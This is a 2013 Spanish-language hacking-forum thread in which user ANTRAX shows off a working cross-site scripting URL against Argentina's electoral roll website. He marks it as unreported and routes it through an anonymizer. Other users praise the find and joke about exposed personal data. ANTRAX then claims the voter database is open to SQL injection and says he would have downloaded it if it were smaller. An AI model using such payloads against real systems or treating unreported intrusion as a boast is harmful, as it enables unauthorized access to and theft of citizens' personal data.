Underc0de - Hacking y seguridad informática

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: ANTRAX en Mayo 17, 2013, 02:15:03 pm

Título: [XSS] padron.gob.ar
Publicado por: ANTRAX en Mayo 17, 2013, 02:15:03 pm
XSS en el padron electoral de Argentina

(http://img46.imageshack.us/img46/3662/padronelectoral.png)

Reportado: NO
URL: http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.padron.gob.ar/consulta/version_impresa.php?x_mat=111111111&x_ape=%3Cscript%3Ealert%28%27ANTRAX%27%29%3C/script%3E&x_nom=los%20nonamesx_sec=7&x_cir=57&x_dess=LaConChinChina&x_desc=CIUDAD&x_desl=&x_dirl=&x_locl=&x_mes=0&x_det=&x_par=0&x_dis=&x_dom=CalleFalsa%20123&x_pro=&x_tip=DNI-EA&x_padron=&x_orden=
Título: Re:[XSS] padron.gob.ar
Publicado por: hielasangre en Mayo 17, 2013, 05:26:00 pm
Eso es lo de menos, el problema son los datos expuestos xD
Buen XSS :B
Título: Re:[XSS] padron.gob.ar
Publicado por: ANTRAX en Mayo 17, 2013, 05:36:33 pm
Hablando de datos expuestos...

(http://sphotos-e.ak.fbcdn.net/hphotos-ak-prn2/970248_10201389040233493_441973371_n.jpg)
Título: Re:[XSS] padron.gob.ar
Publicado por: StuXn3t en Mayo 17, 2013, 06:00:20 pm
Wow....buen aporte Antrax!
Con eso se demuestra el riesgo de las Aplicaciones Web....  :)
Título: Re:[XSS] padron.gob.ar
Publicado por: hielasangre en Mayo 17, 2013, 06:35:29 pm
Hablando de datos expuestos...

(http://sphotos-e.ak.fbcdn.net/hphotos-ak-prn2/970248_10201389040233493_441973371_n.jpg)

Me mato de Gorila antes que planero xD

http://www.idontplaydarts.com/2011/05/exploit-phpcaptcha-securimage/
Título: Re:[XSS] padron.gob.ar
Publicado por: s3cur1tyr00t en Mayo 17, 2013, 07:02:32 pm
Mmm, si investigan un poquito mas se van a dar cuenta que estan bastante mas fregados que un XSS en la aplicación :)
Título: Re:[XSS] padron.gob.ar
Publicado por: ANTRAX en Mayo 17, 2013, 07:07:42 pm
Es un desastre... La base de datos del padron de Argentina tiene un SQLi... Lastima que son muchas tablas sino la bajaba ajajaja